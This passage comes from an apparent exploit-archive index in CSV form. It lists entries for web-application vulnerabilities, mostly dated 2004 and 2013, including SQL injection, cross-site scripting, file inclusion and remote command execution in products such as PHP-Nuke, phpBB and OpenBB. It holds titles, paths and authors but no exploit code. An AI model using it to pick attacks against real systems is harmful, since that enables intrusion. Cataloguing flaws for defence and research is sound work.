'tiki-list_blogs.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps, -23978,exploits/php/webapps/23978.txt,"TikiWiki Project 1.8 - 'tiki-usermenu.php?offset' SQL Injection",2004-04-12,JeiAr,php,webapps, -33401,exploits/php/webapps/33401.txt,"Million Pixel Script 3 - 'pa' Cross-Site Scripting",2009-12-14,bi0,php,webapps, -23982,exploits/php/webapps/23982.txt,"TikiWiki Project 1.8 - 'tiki-list_faqs.php?offset' SQL Injection",2004-04-12,JeiAr,php,webapps, -23983,exploits/php/webapps/23983.txt,"TikiWiki Project 1.8 - 'tiki-list_trackers.php?offset' SQL Injection",2004-04-12,JeiAr,php,webapps, -23984,exploits/php/webapps/23984.txt,"TikiWiki Project 1.8 - 'tiki-list_blogs.php?offset' SQL Injection",2004-04-12,JeiAr,php,webapps, -23986,exploits/cgi/webapps/23986.txt,"BlackBoard Learning System 5.x/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,"DarC KonQuest",cgi,webapps, -23988,exploits/php/webapps/23988.txt,"Nuked-klaN 1.x - Multiple Vulnerabilities",2004-04-12,frog,php,webapps, -23990,exploits/php/webapps/23990.txt,"PHP-Nuke 6.x/7.x - CookieDecode Cross-Site Scripting",2004-04-13,waraxe,php,webapps, -23991,exploits/php/webapps/23991.txt,"Tutos 1.1.20031017 - 'note_overview.php?id' SQL Injection",2004-04-13,"François SORIN",php,webapps, -23998,exploits/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injections",2004-04-13,waraxe,php,webapps, -23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps, -23994,exploits/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,cr4wl3r,php,webapps, -23995,exploits/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G - Directory Traversal",2013-01-09,"Dhruv Shah",hardware,webapps, -23997,exploits/php/webapps/23997.txt,"WeBid 1.0.6 - SQL Injection",2013-01-09,"Life Wasted",php,webapps, -24001,exploits/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 - Cross-Site Scripting",2004-04-14,"Noam Rathaus",cgi,webapps, -24003,exploits/php/webapps/24003.txt,"phpBugTracker 0.9 - 'query.php' Multiple SQL Injections",2004-04-15,JeiAr,php,webapps, -24004,exploits/php/webapps/24004.txt,"phpBugTracker 0.9 - 'bug.php' Multiple SQL Injections",2004-04-15,JeiAr,php,webapps, -24005,exploits/php/webapps/24005.txt,"phpBugTracker 0.9 - 'bug.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-15,JeiAr,php,webapps, -24006,exploits/php/webapps/24006.txt,"phpBugTracker 0.9 - 'query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-15,JeiAr,php,webapps, -24007,exploits/php/webapps/24007.txt,"phpBugTracker 0.9 - 'user.php?bugid' Cross-Site Scripting",2004-04-15,JeiAr,php,webapps, -24008,exploits/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x - Email Attachment Script Injection",2004-04-15,"spiffomatic 64",php,webapps, -24009,exploits/php/webapps/24009.txt,"Gemitel 3.50 - '/affich.php' Remote File Inclusion / Command Injection",2004-04-15,jaguar,php,webapps, -24016,exploits/php/webapps/24016.txt,"Phorum 3.4.x - Phorum_URIAuth SQL Injection",2004-04-19,"Janek Vind",php,webapps, -24026,exploits/php/webapps/24026.txt,"phpBB 2.0.x - 'album_portal.php' Remote File Inclusion",2004-04-19,Officerrr,php,webapps, -24034,exploits/php/webapps/24034.txt,"PHProfession 2.5 - 'modules.php?offset' SQL Injection",2004-04-23,"Janek Vind",php,webapps, -24035,exploits/php/webapps/24035.txt,"PHProfession 2.5 - 'upload.php' Direct Request Full Path Disclosure",2004-04-23,"Janek Vind",php,webapps, -24036,exploits/php/webapps/24036.txt,"PHProfession 2.5 - 'modules.php?jcode' Cross-Site Scripting",2004-04-23,"Janek Vind",php,webapps, -24037,exploits/php/webapps/24037.txt,"PostNuke Phoenix 0.726 - 'openwindow.php?hlpfile' Cross-Site Scripting",2004-04-21,"Janek Vind",php,webapps, -24039,exploits/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 Beta - Database Disclosure",2004-04-22,CyberTal0n,asp,webapps, -24044,exploits/php/webapps/24044.txt,"PHPLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps, -24049,exploits/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - 'Ver.asp' Information Disclosure",2004-04-23,CyberTalon,asp,webapps, -24050,exploits/php/webapps/24050.txt,"Advanced Guestbook 2.2 - 'Password' SQL Injection",2004-04-23,JQ,php,webapps, -24052,exploits/php/webapps/24052.txt,"OpenBB 1.0.x - 'member.php?redirect' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps, -24053,exploits/php/webapps/24053.txt,"OpenBB 1.0.x - 'myhome.php?to' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps, -24054,exploits/php/webapps/24054.txt,"OpenBB 1.0.x - 'post.php?TID' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps, -24055,exploits/php/webapps/24055.txt,"OpenBB 1.0.x - 'index.php?redirect' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps, -24056,exploits/php/webapps/24056.txt,"OpenBB 1.0.x - 'board.php?FID' SQL Injection",2004-04-26,JeiAr,php,webapps, -24057,exploits/php/webapps/24057.txt,"OpenBB 1.0.x - 'member.php' Multiple SQL Injections",2004-04-26,JeiAr,php,webapps, -24058,exploits/php/webapps/24058.txt,"OpenBB 1.0.x - 'search.php?q' SQL Injection",2004-04-26,JeiAr,php,webapps, -24059,exploits/php/webapps/24059.txt,"OpenBB 1.0.x - 'post.php' Multiple SQL Injections",2004-04-26,JeiAr,php,webapps, -24060,exploits/php/webapps/24060.txt,"PHP-Nuke 7.2 Multiple Video Gallery Module - SQL Injection",2004-04-26,"k1LL3r B0y",php,webapps, -24061,exploits/php/webapps/24061.txt,"OpenBB 1.0.x - Private Message Disclosure",2004-04-26,"Manuel Lopez",php,webapps, -24068,exploits/php/webapps/24068.txt,"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting",2004-04-30,"Alvin Alex",php,webapps, -24071,exploits/php/webapps/24071.txt,"Moodle 1.1/1.2 - Cross-Site Scripting",2004-04-30,"Bartek Nowotarski",php,webapps, -24072,exploits/php/webapps/24072.txt,"Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting",2004-04-30,"Janek Vind",php,webapps, -24073,exploits/php/webapps/24073.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'startdir' Traversal Arbitrary File Access",2004-04-30,"Janek Vind",php,webapps, -24074,exploits/php/webapps/24074.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps, -24075,exploits/php/webapps/24075.txt,"Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps, -24081,exploits/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 - 'AddUser.cfm' Administrator Command Execution",2004-05-05,"Stuart Jamieson",cfm,webapps, -24082,exploits/php/webapps/24082.txt,"Simple Machines Forum (SMF) 1.0 - Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps, -24083,exploits/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps, -24086,exploits/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - 'go' Open Redirect",2013-01-13,LiquidWorm,php,webapps, -24087,exploits/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,php,webapps, -24088,exploits/php/webapps/24088.txt,"PHPX 3.x - '/page.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps, -24089,exploits/php/webapps/24089.txt,"PHPX 3.x - '/news.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps, -24090,exploits/php/webapps/24090.txt,"PHPX 3.x - '/user.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps, -24091,exploits/php/webapps/24091.txt,"PHPX 3.x - '/images.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps, -24092,exploits/php/webapps/24092.txt,"PHPX 3.x - '/forums.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps, -24094,exploits/cgi/webapps/24094.txt,"SurgeLDAP 1.0 - Web Administration Authentication Bypass",2004-05-05,"GSS IT",cgi,webapps, -24099,exploits/php/webapps/24099.txt,"Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities",2004-05-08,"Janek Vind",php,webapps, -24100,exploits/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection",2004-05-08,"Janek Vind",php,webapps, -24104,exploits/php/webapps/24104.txt,"Tutorials Manager 1.0 - Multiple SQL Injections",2004-05-10,"Hillel Himovich",php,webapps, -24108,exploits/php/webapps/24108.txt,"phpShop 2.0 - SQL Injection",2013-01-14,"By onestree",php,webapps, -43146,exploits/hardware/webapps/43146.txt,"D-Link DCS-936L Network Camera - Cross-Site Request Forgery",2017-03-26,SlidingWindow,hardware,webapps, -24122,exploits/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps, -24124,exploits/php/webapps/24124.txt,"vBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,php,webapps, -24126,exploits/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,php,webapps, -24127,exploits/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion",2004-05-17,waraxe,php,webapps, -24131,exploits/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,php,webapps, -24134,exploits/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",php,webapps, -24138,exploits/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - 'Log.php' HTML Injection",2004-05-21,Chinchilla,php,webapps, -24139,exploits/jsp/webapps/24139.txt,"Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-05-22,"Sandeep Giri",jsp,webapps, -24151,exploits/php/webapps/24151.txt,"jPORTAL 2.2.1 - 'print.php' SQL Injection",2004-05-28,"Maciek Wierciski",php,webapps, -24152,exploits/php/webapps/24152.txt,"Land Down Under - BBCode HTML Injection",2004-05-29,"Tim De Gier",php,webapps, -24153,exploits/php/webapps/24153.txt,"e107 website system 0.6 - 'usersettings.php?avmsg' Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps, -24154,exploits/php/webapps/24154.txt,"e107 website system 0.6 - 'email article to a friend' Feature Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps, -24186,exploits/php/webapps/24186.txt,"Invision Power Board 1.3 - 'SSI.php' SQL Injection",2004-06-11,JvdR,php,webapps, -24188,exploits/cgi/webapps/24188.pl,"BlackBoard Learning System 6.0 - Dropbox File Download",2004-06-10,"Maarten Verbeek",cgi,webapps, -24157,exploits/php/webapps/24157.txt,"Cydia Repo Manager - Cross-Site Request Forgery",2013-01-16,"Ramdan Yantu",php,webapps, -24158,exploits/jsp/webapps/24158.txt,"Oracle Application Framework - Diagnostic Mode Bypass",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps, -24164,exploits/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps, -24166,exploits/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps, -24167,exploits/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps, -24168,exploits/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - 'Settings' PHP Remote File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps, -24169,exploits/php/webapps/24169.txt,"Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities",2004-06-04,"HNK Technology Solutions",php,webapps, -24172,exploits/php/webapps/24172.txt,"cPanel 5-9 - Killacct Script Customer Account DNS Information Deletion",2004-06-05,"qbann targ",php,webapps, -24175,exploits/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 - 'Next_file' File Disclosure",2004-06-07,"John Doe",cgi,webapps, -24176,exploits/php/webapps/24176.txt,"NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Error Message Full Path Disclosure",2004-06-07,"Donnie Werner",php,webapps, -24177,exploits/php/webapps/24177.txt,"NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Login Form Cross-Site Scripting",2004-06-07,"Donnie Werner",php,webapps, -24180,exploits/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps, -24183,exploits/php/webapps/24183.txt,"cPanel 5-9 - Passwd SQL Injection",2004-06-09,verb0s@virtualnova.net,php,webapps, -24184,exploits/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 - Access Validation",2004-06-09,"Thomas Ryan",asp,webapps, -24185,exploits/asp/webapps/24185.txt,"AspDotNetStorefront 3.3 - 'ReturnURL' Cross-Site Scripting",2004-06-09,"Thomas Ryan",asp,webapps, -24190,exploits/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x FAQ Module - 'categories' Cross-Site Scripting",2004-06-11,"Janek Vind",java,webapps, -24191,exploits/php/webapps/24191.txt,"PHP-Nuke 6.x/7.x Encyclopedia Module - Multiple Function Cross-Site Scripting Vulnerabilities",2004-06-11,"Janek Vind",php,webapps, -24192,exploits/php/webapps/24192.txt,"PHP-Nuke 6.x/7.x Reviews Module - 'order' SQL Injection",2004-06-11,"Janek Vind",php,webapps, -24193,exploits/php/webapps/24193.txt,"PHP-Nuke 6.x/7.x - Multiple Input Validation Vulnerabilities",2004-06-11,"Janek Vind",php,webapps, -24194,exploits/php/webapps/24194.txt,"PHP-Nuke 6.x/7.x Reviews Module - Multiple Cross-Site Scripting Vulnerabilities",2004-06-11,"Janek Vind",php,webapps, -24197,exploits/cgi/webapps/24197.txt,"Linksys Web Camera Software 2.10 - 'Next_file' Cross-Site Scripting",2004-06-14,scriptX,cgi,webapps, -24198,exploits/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting",2004-06-14,"Thomas Ryan",asp,webapps, -24199,exploits/php/webapps/24199.txt,"Invision Power Board 1.3 - 'SSI.php' Cross-Site Scripting",2004-06-14,"IMAN Sharafoddin",php,webapps, -24201,exploits/php/webapps/24201.txt,"PHP-Charts - Arbitrary PHP Code Execution",2013-01-18,AkaStep,php,webapps, -24202,exploits/hardware/webapps/24202.txt,"Linksys WRT54GL Firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps, -24203,exploits/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps, -24204,exploits/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",multiple,webapps, -24212,exploits/php/webapps/24212.txt,"Pivot 1.0 - 'module_db.php' Remote File Inclusion",2004-06-15,loofus,php,webapps, -24214,exploits/asp/webapps/24214.txt,"Web Wiz Forums 7.x - 'Registration_Rules.asp' Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps, -24215,exploits/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - 'usersL.php3' Multiple SQL Injections",2004-06-15,HEX,php,webapps, -24216,exploits/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3?do_not_login' Authentication Bypass",2004-06-15,HEX,php,webapps, -24217,exploits/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - 'admin.php3' Arbitrary File Access",2004-06-15,HEX,php,webapps, -24225,exploits/php/webapps/24225.php,"osTicket STS 1.2 - Attachment Remote Command Execution",2004-06-21,"Guy Pearce",php,webapps, -24227,exploits/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",php,webapps, -24228,exploits/php/webapps/24228.txt,"Joomla! Component com_collector - Arbitrary File Upload",2013-01-19,"Red Dragon_al",php,webapps, -24229,exploits/php/webapps/24229.txt,"WordPress Plugin Ripe HD FLV Player - SQL Injection",2013-01-19,Zikou-16,php,webapps, -24231,exploits/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting",2004-06-22,"Josh Gilmour",php,webapps, -24232,exploits/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps, -24234,exploits/php/webapps/24234.html,"vBulletin 3.0.1 - 'newreply.php?WYSIWYG_HTML' Cross-Site Scripting",2004-06-24,"Cheng Peng Su",php,webapps, -24235,exploits/php/webapps/24235.txt,"ZaireWeb Solutions NewsLetter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,php,webapps, -24236,exploits/cgi/webapps/24236.txt,"McMurtrey/Whitaker & Associates Cart32 2-5 GetLatestBuilds Script - Cross-Site Scripting",2004-06-28,"Dr.Ponidi Haryanto",cgi,webapps, -24237,exploits/cgi/webapps/24237.txt,"CGIScript.net CSFAQ 1.0 Script - Full Path Disclosure",2004-06-28,DarkBicho,cgi,webapps, -24238,exploits/php/webapps/24238.txt,"CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps, -24239,exploits/php/webapps/24239.txt,"CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps, -24240,exploits/php/webapps/24240.txt,"CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps, -24241,exploits/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps, -24244,exploits/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps, -24245,exploits/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps, -24251,exploits/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps, -24252,exploits/cgi/webapps/24252.txt,"Fastream NETFile FTP/Web Server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",cgi,webapps, -24254,exploits/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps, -24255,exploits/php/webapps/24255.txt,"Jaws 0.2/0.3 - 'gadget' Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps, -24256,exploits/php/webapps/24256.php,"Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps, -24257,exploits/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps, -24260,exploits/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - 'comersus_gatewayPayPal.asp' Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps, -24261,exploits/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - 'comersus_message.asp' Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps, -24269,exploits/php/webapps/24269.txt,"NConf 1.3 - '/detail.php/detail_admin_items.php?id' SQL Injection",2013-01-21,haidao,php,webapps, -24270,exploits/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps, -24357,exploits/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps, -24274,exploits/php/webapps/24274.pl,"phpBB 2.0.x - 'viewtopic.php' PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps, -24279,exploits/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],php,webapps, -24284,exploits/cgi/webapps/24284.txt,"Gattaca Server 2003 - Null Byte Full Path Disclosure",2004-07-15,dr_insane,cgi,webapps, -24285,exploits/cgi/webapps/24285.txt,"Gattaca Server 2003 - 'Language' Path Exposure",2004-07-15,dr_insane,cgi,webapps, -24286,exploits/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,cgi,webapps, -24287,exploits/cgi/webapps/24287.txt,"BoardPower Forum - 'ICQ.cgi' Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps, -24289,exploits/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script - Remote File Inclusion",2004-07-19,"Adam Simuntis",php,webapps, -24290,exploits/php/webapps/24290.txt,"CuteNews 1.3 - Comment HTML Injection",2004-07-19,DarkBicho,php,webapps, -24291,exploits/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection",2004-07-19,DarkBicho,php,webapps, -24292,exploits/php/webapps/24292.txt,"Adam Ismay Print Topic Mod 1.0 - SQL Injection",2004-07-19,"Bartek Nowotarski",php,webapps, -24294,exploits/php/webapps/24294.txt,"WordPress Plugin Developer Formatter - Cross-Site Request Forgery",2013-01-22,"Junaid Hussain",php,webapps, -24295,exploits/php/webapps/24295.txt,"Adult WebMaster Script - Password Disclosure",2013-01-22,"Dshellnoi Unix",php,webapps, -24356,exploits/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting",2004-08-16,"Javier Ubilla",php,webapps, -24296,exploits/php/webapps/24296.txt,"Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps, -24298,exploits/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 - Cookie Object SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps, -24299,exploits/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps, -24300,exploits/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps, -24301,exploits/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps, -24302,exploits/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication Bypass",2004-07-21,"Noam Rathaus",asp,webapps, -24303,exploits/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injections",2004-07-21,"Noam Rathaus",php,webapps, -24306,exploits/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module - Directory Traversal",2004-07-23,sullo@cirt.net,php,webapps, -24307,exploits/php/webapps/24307.txt,"PostNuke 0.7x - Install Script Administrator Password Disclosure",2004-07-24,hellsink,php,webapps, -24311,exploits/php/webapps/24311.txt,"EasyIns Stadtportal 4.0 - 'Site' Remote File Inclusion",2004-07-24,"Francisco Alisson",php,webapps, -24313,exploits/asp/webapps/24313.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_search.asp?Typeen' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps, -24314,exploits/asp/webapps/24314.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_edit.asp?SQL' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps, -24315,exploits/asp/webapps/24315.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE]_list.asp?searchFor' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps, -24316,exploits/asp/webapps/24316.txt,"XLineSoft ASPRunner 1.0/2.x - 'export.asp?SQL' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps, -24317,exploits/asp/webapps/24317.txt,"XLineSoft ASPRunner 1.0/2.x - Database Direct Request Information Disclosure",2004-07-26,"Ferruh Mavituna",asp,webapps, -24320,exploits/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection",2013-01-24,RealGame,multiple,webapps, -24324,exploits/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module - Cross-Site Scripting",2004-07-26,DarkBicho,php,webapps, -24329,exploits/php/webapps/24329.txt,"AntiBoard 0.6/0.7 - 'antiboard.php' Multiple SQL Injections",2004-07-28,"Josh Gilmour",php,webapps, -24330,exploits/php/webapps/24330.txt,"AntiBoard 0.6/0.7 - 'antiboard.php?feedback' Cross-Site Scripting",2004-07-28,"Josh Gilmour",php,webapps, -24331,exploits/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,php,webapps, -24332,exploits/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,php,webapps, -24333,exploits/php/webapps/24333.txt,"Verylost LostBook 1.1 - Message Entry HTML Injection",2004-07-29,"Joseph Moniz",php,webapps, -24334,exploits/php/webapps/24334.txt,"Jaws 0.2/0.3/0.4 - 'ControlPanel.php' SQL Injection",2004-07-29,"Fernando Quintero",php,webapps, -24340,exploits/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,php,webapps, -24341,exploits/php/webapps/24341.txt,"Fusionphp Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps, -24347,exploits/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 - Remote Command Execution",2004-08-04,"Francisco Alisson",cgi,webapps, -24348,exploits/php/webapps/24348.txt,"eNdonesia 8.3 - Search Form Cross-Site Scripting",2004-08-04,"Ahmad Muammar",php,webapps, -24349,exploits/php/webapps/24349.txt,"PHP-Nuke 0-7 - Delete God Admin Access Control Bypass",2004-08-04,"Ahmad Muammar",php,webapps, -24359,exploits/php/webapps/24359.php,"YaPiG 0.92 - Remote Server-Side Script Execution",2004-07-07,aCiDBiTS,php,webapps, -24364,exploits/php/webapps/24364.txt,"WordPress Plugin SolveMedia 1.1.0 - Cross-Site Request Forgery",2013-01-25,"Junaid Hussain",php,webapps, -24365,exploits/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",php,webapps, -24367,exploits/php/webapps/24367.txt,"IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities",2004-08-11,ShineShadow,php,webapps, -24368,exploits/asp/webapps/24368.txt,"MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure",2004-07-15,anonymous,asp,webapps, -24369,exploits/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 - 'MapFrame.asp?mapname' Cross-Site Scripting",2004-07-15,anonymous,asp,webapps, -24370,exploits/asp/webapps/24370.txt,"MapInfo Discovery 1.0/1.1 - Cleartext Transmission Credential Disclosure",2004-07-15,anonymous,asp,webapps, -24371,exploits/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Authentication Bypass",2004-07-15,anonymous,asp,webapps, -24372,exploits/php/webapps/24372.txt,"CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting",2004-07-16,"Debasis Mohanty",php,webapps, -24373,exploits/php/webapps/24373.txt,"PScript PForum 1.24/1.25 - User Profile HTML Injection",2004-07-16,"Christoph Jeschke",php,webapps, -24375,exploits/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - 'Auth_Login.php' SQL Injection",2004-07-16,"Fernando Quintero",php,webapps, -24377,exploits/php/webapps/24377.txt,"Merak Mail Server 7.4.5 - 'address.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,php,webapps, -24378,exploits/php/webapps/24378.txt,"Merak Mail Server 7.4.5 - 'settings.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,php,webapps, -24379,exploits/php/webapps/24379.txt,"Merak Mail Server 7.4.5 - 'attachment.html?attachmentpage_text_error' Cross-Site Scripting",2004-07-17,Criolabs,php,webapps, -24380,exploits/php/webapps/24380.txt,"Merak Mail Server 7.4.5 - HTML Message Body Cross-Site Scripting",2004-07-17,Criolabs,php,webapps, -24381,exploits/php/webapps/24381.txt,"Merak Mail Server 7.4.5 - address.html Full Path Disclosure",2004-07-17,Criolabs,php,webapps, -24382,exploits/php/webapps/24382.txt,"Merak Mail Server 7.4.5 - 'calendar.html?schedule' SQL Injection",2004-07-17,Criolabs,php,webapps, -24383,exploits/php/webapps/24383.php,"Gallery 1.4.4 - Remote Server-Side Script 